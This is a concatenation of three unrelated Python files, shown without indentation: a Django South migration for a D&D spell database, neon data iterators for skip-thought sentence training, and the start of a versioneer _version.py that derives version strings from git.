('xp_component', self.gf('django.db.models.fields.BooleanField')(default=False)),
('casting_time', self.gf('django.db.models.fields.CharField')(max_length=256, null=True, blank=True)),
('range', self.gf('django.db.models.fields.CharField')(max_length=256, null=True, blank=True)),
('target', self.gf('django.db.models.fields.CharField')(max_length=256, null=True, blank=True)),
('effect', self.gf('django.db.models.fields.CharField')(max_length=256, null=True, blank=True)),
('area', self.gf('django.db.models.fields.CharField')(max_length=256, null=True, blank=True)),
('duration', self.gf('django.db.models.fields.CharField')(max_length=256, null=True, blank=True)),
('saving_throw', self.gf('django.db.models.fields.CharField')(max_length=128, null=True, blank=True)),
('spell_resistance', self.gf('django.db.models.fields.CharField')(max_length=64, null=True, blank=True)),
('description', self.gf('django.db.models.fields.TextField')()),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=72, db_index=True)),
))
db.send_create_signal('dnd', ['Spell'])
# Adding unique constraint on 'Spell', fields ['name', 'rulebook']
db.create_unique('dnd_spell', ['name', 'rulebook_id'])
# Adding M2M table for field descriptors on 'Spell'
db.create_table('dnd_spell_descriptors', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('spell', models.ForeignKey(orm['dnd.spell'], null=False)),
('spelldescriptor', models.ForeignKey(orm['dnd.spelldescriptor'], null=False))
))
db.create_unique('dnd_spell_descriptors', ['spell_id', 'spelldescriptor_id'])
# Adding model 'SpellClassLevel'
db.create_table('dnd_spellclasslevel', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('character_class', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['dnd.CharacterClass'])),
('spell', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['dnd.Spell'])),
('level', self.gf('django.db.models.fields.PositiveSmallIntegerField')()),
))
db.send_create_signal('dnd', ['SpellClassLevel'])
# Adding unique constraint on 'SpellClassLevel', fields ['character_class', 'spell']
db.create_unique('dnd_spellclasslevel', ['character_class_id', 'spell_id'])
# Adding model 'SpellDomainLevel'
db.create_table('dnd_spelldomainlevel', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('domain', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['dnd.Domain'])),
('spell', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['dnd.Spell'])),
('level', self.gf('django.db.models.fields.PositiveSmallIntegerField')()),
))
db.send_create_signal('dnd', ['SpellDomainLevel'])
# Adding unique constraint on 'SpellDomainLevel', fields ['domain', 'spell']
db.create_unique('dnd_spelldomainlevel', ['domain_id', 'spell_id'])
def backwards(self, orm):
# Removing unique constraint on 'SpellDomainLevel', fields ['domain', 'spell']
db.delete_unique('dnd_spelldomainlevel', ['domain_id', 'spell_id'])
# Removing unique constraint on 'SpellClassLevel', fields ['character_class', 'spell']
db.delete_unique('dnd_spellclasslevel', ['character_class_id', 'spell_id'])
# Removing unique constraint on 'Spell', fields ['name', 'rulebook']
db.delete_unique('dnd_spell', ['name', 'rulebook_id'])
# Removing unique constraint on 'Domain', fields ['name', 'rulebook']
db.delete_unique('dnd_domain', ['name', 'rulebook_id'])
# Removing unique constraint on 'CharacterClass', fields ['name', 'rulebook']
db.delete_unique('dnd_characterclass', ['name', 'rulebook_id'])
# Deleting model 'DndEdition'
db.delete_table('dnd_dndedition')
# Deleting model 'Rulebook'
db.delete_table('dnd_rulebook')
# Deleting model 'CharacterClass'
db.delete_table('dnd_characterclass')
# Deleting model 'Domain'
db.delete_table('dnd_domain')
# Deleting model 'SpellDescriptor'
db.delete_table('dnd_spelldescriptor')
# Deleting model 'SpellSchool'
db.delete_table('dnd_spellschool')
# Deleting model 'SpellSubSchool'
db.delete_table('dnd_spellsubschool')
# Deleting model 'Spell'
db.delete_table('dnd_spell')
# Removing M2M table for field descriptors on 'Spell'
db.delete_table('dnd_spell_descriptors')
# Deleting model 'SpellClassLevel'
db.delete_table('dnd_spellclasslevel')
# Deleting model 'SpellDomainLevel'
db.delete_table('dnd_spelldomainlevel')
models = {
'dnd.characterclass': {
'Meta': {'ordering': "['name']", 'unique_together': "(('name', 'rulebook'),)", 'object_name': 'CharacterClass'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'page': ('django.db.models.fields.PositiveIntegerField', [], {'blank': 'True'}),
'prestige': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'rulebook': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['dnd.Rulebook']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '72', 'db_index': 'True'})
},
'dnd.dndedition': {
'Meta': {'ordering': "['name']", 'object_name': 'DndEdition'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '40', 'db_index': 'True'}),
'system': ('django.db.models.fields.CharField', [], {'max_length': '16'})
},
'dnd.domain': {
'Meta': {'ordering': "['name']", 'unique_together': "(('name', 'rulebook'),)", 'object_name': 'Domain'},
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'page': ('django.db.models.fields.PositiveIntegerField', [], {'blank': 'True'}),
'rulebook': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['dnd.Rulebook']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '72', 'db_index': 'True'})
},
'dnd.rulebook': {
'Meta': {'ordering': "['name']", 'object_name': 'Rulebook'},
'abbr': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'dnd_edition': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['dnd.DndEdition']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'img_url': ('django.db.models.fields.URLField', [], {'max_length': '255', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'official_url': ('django.db.models.fields.URLField', [], {'max_length': '255', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '72', 'db_index': 'True'}),
'year': ('django.db.models.fields.CharField', [], {'max_length': '4', 'null': 'True', 'blank': 'True'})
},
'dnd.spell': {
'Meta': {'ordering': "['name']", 'unique_together': "(('name', 'rulebook'),)", 'object_name': 'Spell'},
'added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'arcane_focus_component': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'area': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'casting_time': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'class_levels': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['dnd.CharacterClass']", 'through': "orm['dnd.SpellClassLevel']", 'symmetrical': 'False'}),
'description': ('django.db.models.fields.TextField', [], {}),
'descriptors': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['dnd.SpellDescriptor']", 'symmetrical': 'False', 'blank': 'True'}),
'divine_focus_component': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'domain_levels': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['dnd.Domain']", 'through': "orm['dnd.SpellDomainLevel']", 'symmetrical': 'False'}),
'duration': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'effect': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'material_component': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'page': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'range': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'rulebook': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['dnd.Rulebook']"}),
'saving_throw': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'school': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['dnd.SpellSchool']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '72', 'db_index': 'True'}),
'somatic_component': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'spell_resistance': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'sub_school': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['dnd.SpellSubSchool']", 'null': 'True', 'blank': 'True'}),
'target': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'verbal_component': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'xp_component': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'dnd.spellclasslevel': {
'Meta': {'ordering': "['spell', 'level']", 'unique_together': "(('character_class', 'spell'),)", 'object_name': 'SpellClassLevel'},
'character_class': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['dnd.CharacterClass']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'spell': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['dnd.Spell']"})
},
'dnd.spelldescriptor': {
'Meta': {'ordering': "['name']", 'object_name': 'SpellDescriptor'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '72', 'db_index': 'True'})
},
'dnd.spelldomainlevel': {
'Meta': {'ordering': "['spell', 'level']", 'unique_together': "(('domain', 'spell'),)", 'object_name': 'SpellDomainLevel'},
'domain': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['dnd.Domain']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'spell': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['dnd.Spell']"})
},
'dnd.spellschool': {
'Meta': {'ordering': "['name']", 'object_name': 'SpellSchool'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '40', 'db_index': 'True'})
},
'dnd.spellsubschool': {
'Meta': {'ordering': "['name']", 'object_name': 'SpellSubSchool'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '40', 'db_index': 'True'})
}
}
complete_apps = ['dnd']
|
|
#!/usr/bin/env python
# ******************************************************************************
# Copyright 2017-2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ******************************************************************************
from __future__ import division
import numpy as np
import h5py
import copy
from neon.data.dataiterator import NervanaDataIterator
class SentenceEncode(NervanaDataIterator):
"""
This class defines an iterator for loading and iterating the sentences in
a structure to encode sentences into the skip-thought vectors
"""
def __init__(self, sentences, sentence_text, nsamples, nwords,
max_len=100, index_from=2):
"""
Construct a sentence dataset object.
Build the context using skip-thought model
Aguments:
sentences: list of tokenized (and int-encoded) sentences to use for iteration
sentence_text: list of raw text sentences
nsamples: number of sentences
nwords: number of words in vocab
"""
super(SentenceEncode, self).__init__(name=None)
self.nsamples = nsamples
self.nwords = nwords
self.batch_index = 0
self.nbatches = 0
self.max_len = max_len
self.index_from = index_from
# group the sentences to triplets
source = sentences[:nsamples]
source_text = sentence_text[:nsamples]
extra_sent = len(source) % self.be.bsz
self.nbatches = len(source) // self.be.bsz
self.ndata = self.nbatches * self.be.bsz # no leftovers
if extra_sent:
source = source[:-extra_sent]
source_text = source_text[:-extra_sent]
# get sentence length stats based on the input sentence length
self.sent_len = dict((i, min(len(c), self.max_len)) for i, c in enumerate(source))
self.X = source
self.X_text = source_text
# inputs using embeddings
self.dev_X = self.be.iobuf(self.max_len, dtype=np.int32)
# the np array to put noncontiguous data in. use for entire minibatch
self.X_np = np.empty((self.max_len, self.be.bsz), dtype=np.int32)
self.shape = (self.max_len, 1)
def reset(self):
"""
For resetting the starting index of this dataset back to zero.
Relevant for when one wants to call repeated evaluations on the dataset
but don't want to wrap around for the last uneven minibatch
Not necessary when ndata is divisible by batch size
"""
self.batch_index = 0
def __iter__(self):
"""
Generator that can be used to iterate over this dataset
"""
self.batch_index = 0
while self.batch_index < self.nbatches:
self.X_np.fill(0)
idx = range(self.batch_index * self.be.bsz, (self.batch_index + 1) * self.be.bsz)
for i, ix in enumerate(idx):
s_len = self.sent_len[ix]
self.X_np[-s_len:, i] = self.X[ix][-s_len:] + self.index_from
self.dev_X.set(self.X_np)
self.batch_index += 1
yield (self.dev_X, None)
# --------------------------------------------------------
# Modified from: Skip-Thoughts
# Licensed under Apache License 2.0 [see LICENSE for details]
# Written by Ryan Kiros
# --------------------------------------------------------
class SentenceHomogenous(NervanaDataIterator):
"""
This class defines an iterator for loading and iterating the sentences in
a structure to train the skip-thought vectors
"""
def __init__(self, data_file=None, sent_name=None, text_name=None,
nwords=None, max_len=30, index_from=2, eos=3):
"""
Construct a sentence dataset object.
Build the context using skip-thought model
Aguments:
data_file (str): path to hdf5 file containing sentences
sent_name (str): name of tokenized dataset
text_name (str): name of raw text dataset
nwords (int): size of vocabulary
max_len (int): maximum number of words per sentence
index_from (int): index offset for padding (0) and OOV (1)
eos (int): index of EOS token
"""
super(SentenceHomogenous, self).__init__(name=None)
self.nwords = nwords
self.batch_index = 0
self.nbatches = 0
self.max_len = max_len
self.index_from = index_from
self.eos = eos
self.data_file = data_file
self.sent_name = sent_name
self.text_name = text_name
h5f = h5py.File(self.data_file, 'r+')
# Extract sentences array from h5 file and make copy in memory
sentences = h5f[self.sent_name][:]
# Load sentence raw text if desired
# sentence_text = h5f[self.text_name]
self.nsamples = h5f[self.sent_name].attrs['nsample'] - 2
# Use shifted view of in-memory copy of sentences to group sentences into triplets
self.source = sentences[1:-1]
self.forward = sentences[2:]
self.backward = sentences[:-2]
self.lengths = [len(cc) for cc in self.source]
self.len_unique = np.unique(self.lengths)
self.len_unique = [ll for ll in self.len_unique if ll <= self.max_len]
self.len_indicies = dict()
self.len_counts = dict()
for ll in self.len_unique:
self.len_indicies[ll] = np.where(self.lengths == ll)[0]
self.len_counts[ll] = len(self.len_indicies[ll])
# Compute number of batches of homogenous lengths
self.nbatches = 0
for ll in self.len_unique:
self.nbatches += int(np.ceil(self.len_counts[ll] / float(self.be.bsz)))
# compute the total number of samples (including empty samples in minibatches)
self.ndata = self.nbatches * self.be.bsz
self.len_curr_counts = copy.copy(self.len_counts)
# inputs using embeddings
self.dev_X = self.be.iobuf(self.max_len, dtype=np.int32)
self.dev_X_p = self.be.iobuf(self.max_len, dtype=np.int32) # previous sentence as input
self.dev_X_n = self.be.iobuf(self.max_len, dtype=np.int32) # next sentence as input
# the np array to put noncontiguous data in. use for entire minibatch
self.X_np = np.empty((self.max_len, self.be.bsz), dtype=np.int32)
self.X_p_np = np.empty((self.max_len, self.be.bsz), dtype=np.int32)
self.X_n_np = np.empty((self.max_len, self.be.bsz), dtype=np.int32)
# flat output labels, do one-hot on device
self.dev_y_p_flat = self.be.iobuf((1, self.max_len), dtype=np.int32)
self.dev_y_n_flat = self.be.iobuf((1, self.max_len), dtype=np.int32)
self.dev_y_p = self.be.iobuf((nwords, self.max_len), dtype=np.int32)
self.dev_y_n = self.be.iobuf((nwords, self.max_len), dtype=np.int32)
# output labels and masks to deal with variable length sentences
self.dev_y_p_mask = self.be.iobuf((nwords, self.max_len), dtype=np.int32)
self.dev_y_n_mask = self.be.iobuf((nwords, self.max_len), dtype=np.int32)
self.dev_y_p_mask_list = self.get_bsz(self.dev_y_p_mask, self.max_len)
self.dev_y_n_mask_list = self.get_bsz(self.dev_y_n_mask, self.max_len)
# for the flat label
self.y_p_np = np.empty((self.max_len, self.be.bsz), dtype=np.int32)
self.y_n_np = np.empty((self.max_len, self.be.bsz), dtype=np.int32)
self.clear_list = [self.X_np, self.X_p_np, self.X_n_np,
self.y_p_np, self.y_n_np,
self.dev_y_p_mask,
self.dev_y_n_mask]
self.shape = [(self.max_len, 1), (self.max_len, 1), (self.max_len, 1)]
h5f.close()
self.reset()
def reset(self):
"""
For resetting the starting index of this dataset back to zero.
Relevant for when one wants to call repeated evaluations on the dataset
but don't want to wrap around for the last uneven minibatch
Not necessary when ndata is divisible by batch size
"""
self.batch_index = 0
self.len_curr_counts = copy.copy(self.len_counts)
self.len_unique = np.random.permutation(self.len_unique)
self.len_indices_pos = dict()
for ll in self.len_unique:
self.len_indices_pos[ll] = 0
self.len_indicies[ll] = np.random.permutation(self.len_indicies[ll])
self.len_idx = -1
def next(self):
"""
Method called by iterator to get a new batch of sentence triplets:
(source, forward, backward). Sentences are returned in order of increasing length,
and source sentences of each batch all have the same length.
"""
self.clear_device_buffer()
# Select the next length which we havent used up yet
count = 0
while True:
self.len_idx = np.mod(self.len_idx+1, len(self.len_unique))
if self.len_curr_counts[self.len_unique[self.len_idx]] > 0:
break
count += 1
if count >= len(self.len_unique):
break
if count >= len(self.len_unique):
self.reset()
raise StopIteration()
curr_len = self.len_unique[self.len_idx]
# get the batch size
curr_batch_size = np.minimum(self.be.bsz,
self.len_curr_counts[curr_len])
curr_pos = self.len_indices_pos[curr_len]
curr_indices = self.len_indicies[curr_len][curr_pos:curr_pos+curr_batch_size]
self.len_indices_pos[curr_len] += curr_batch_size
self.len_curr_counts[curr_len] -= curr_batch_size
# 'feats' corresponds to the after and before sentences
source_batch = [self.source[ii] for ii in curr_indices]
forward_batch = [self.forward[ii] for ii in curr_indices]
backward_batch = [self.backward[ii] for ii in curr_indices]
# Loop over the batch and clip by length, add eos, and flip decoder sentences
for i in range(len(source_batch)):
l_s = min(len(source_batch[i]), self.max_len)
if len(source_batch[i][-l_s:]) == 0:
continue
# NO FLIPPING of the source sentence
self.X_np[-l_s:, i] = source_batch[i][-l_s:] + self.index_from
l_p = min(len(backward_batch[i]), self.max_len)
# clip a long sentence from the left
# for decoder input: take the sent_length-1, prepend a <eos>
# for decoder output: take the sent_length
self.X_p_np[:l_p, i] = [self.eos] + (backward_batch[i][-l_p:-1] +
self.index_from).tolist()
self.y_p_np[:l_p, i] = backward_batch[i][-l_p:] + self.index_from
self.dev_y_p_mask_list[i][:, :l_p] = 1
l_n = min(len(forward_batch[i]), self.max_len)
self.X_n_np[:l_n, i] = [self.eos] + (forward_batch[i][-l_n:-1] +
self.index_from).tolist()
self.y_n_np[:l_n, i] = forward_batch[i][-l_n:] + self.index_from
self.dev_y_n_mask_list[i][:, :l_n] = 1
self.dev_X.set(self.X_np)
self.dev_X_p.set(self.X_p_np)
self.dev_X_n.set(self.X_n_np)
self.dev_y_p_flat.set(self.y_p_np.reshape(1, -1))
self.dev_y_n_flat.set(self.y_n_np.reshape(1, -1))
self.dev_y_p[:] = self.be.onehot(self.dev_y_p_flat, axis=0)
self.dev_y_n[:] = self.be.onehot(self.dev_y_n_flat, axis=0)
self.batch_index += 1
return (self.dev_X, self.dev_X_p, self.dev_X_n), \
((self.dev_y_p, self.dev_y_p_mask), (self.dev_y_n, self.dev_y_n_mask))
def __iter__(self):
"""
Generator that can be used to iterate over this dataset
Input: clip a long sentence from the left
encoder input: take sentence and pad 0 from the left
decoder input: take the sentence length -1, prepend a <eos>, pad 0 from the right
output: decoder output: take the sentence length, pad 0 from the right
"""
return self
def clear_device_buffer(self):
""" Clear the buffers used to hold batches. """
if self.clear_list:
[dev.fill(0) for dev in self.clear_list]
def get_bsz(self, x, nsteps):
if x is None:
return [None for b in range(self.be.bsz)]
xs = x.reshape(-1, nsteps, self.be.bsz)
return [xs[:, :, b] for b in range(self.be.bsz)]
__next__ = next # Python 3.X compatability
|
|
# This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.18 (https://github.com/warner/python-versioneer)
"""Git implementation of _version.py."""
from __future__ import print_function
import errno
import os
import re
import subprocess
import sys
def get_keywords():
"""Get the keywords needed to look up the version information."""
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "$Format:%d$"
git_full = "$Format:%H$"
git_date = "$Format:%ci$"
keywords = {"refnames": git_refnames, "full": git_full, "date": git_date}
return keywords
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_config():
"""Create, populate and return the VersioneerConfig() object."""
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = "pep440"
cfg.tag_prefix = ""
cfg.parentdir_prefix = "None"
cfg.versionfile_source = "docker-make/_version.py"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
"""Decorator to mark a method as the handler for a particular VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False,
env=None):
"""Call the given command(s)."""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, env=env,
stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None, None
else:
if verbose:
print("unable to find command, tried %s" % (commands,))
return None, None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
print("stdout was %s" % stdout)
return None, p.returncode
return stdout, p.returncode
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes both
the project name and a version string. We will also support searching up
two directory levels for an appropriately named parent directory
"""
rootdirs = []
for i in range(3):
dirname = os.path.basename(root)
if dirname.startswith(parentdir_prefix):
return {"version": dirname[len(parentdir_prefix):],
"full-revisionid": None,
"dirty": False, "error": None, "date": None}
else:
rootdirs.append(root)
root = os.path.dirname(root) # up a level
if verbose:
print("Tried directories %s but none started with prefix %s" %
(str(rootdirs), parentdir_prefix))
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
if line.strip().startswith("git_date ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["date"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
date = keywords.get("date")
if date is not None:
# git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant
# datestamp. However we prefer "%ci" (which expands to an "ISO-8601
# -like" string, which we must then edit to make compliant), because
# it's been around since git-1.5.3, and it's too difficult to
# discover which version we're using, or to work around using an
# older one.
date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs - tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %s" % r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None,
"date": date}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags", "date": None}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root,
hide_stderr=True)
if rc != 0:
if verbose:
print("Directory %s not under git control" % root)
raise NotThisMethod("'git rev-parse --git-dir' returned error")
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM)
describe_out, rc = run_command(GITS, ["describe", "--tags", "--dirty",
"--always", "--long",
"--match", "%s*" % tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = ("unable to parse git-describe output: '%s'"
% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = ("tag '%s' doesn't start with prefix '%s'"
% (full_tag, tag_prefix))
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"],
cwd=root)
pieces["distance"] = int(count_out) # total number of commits
# commit date: see ISO-8601 comment in git_versions_from_keywords()
date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"],
cwd=root)[0].strip()
pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
return pieces
def plus_or_dot(pieces):
"""Return a + if we don't already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"],
pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_pre(pieces):
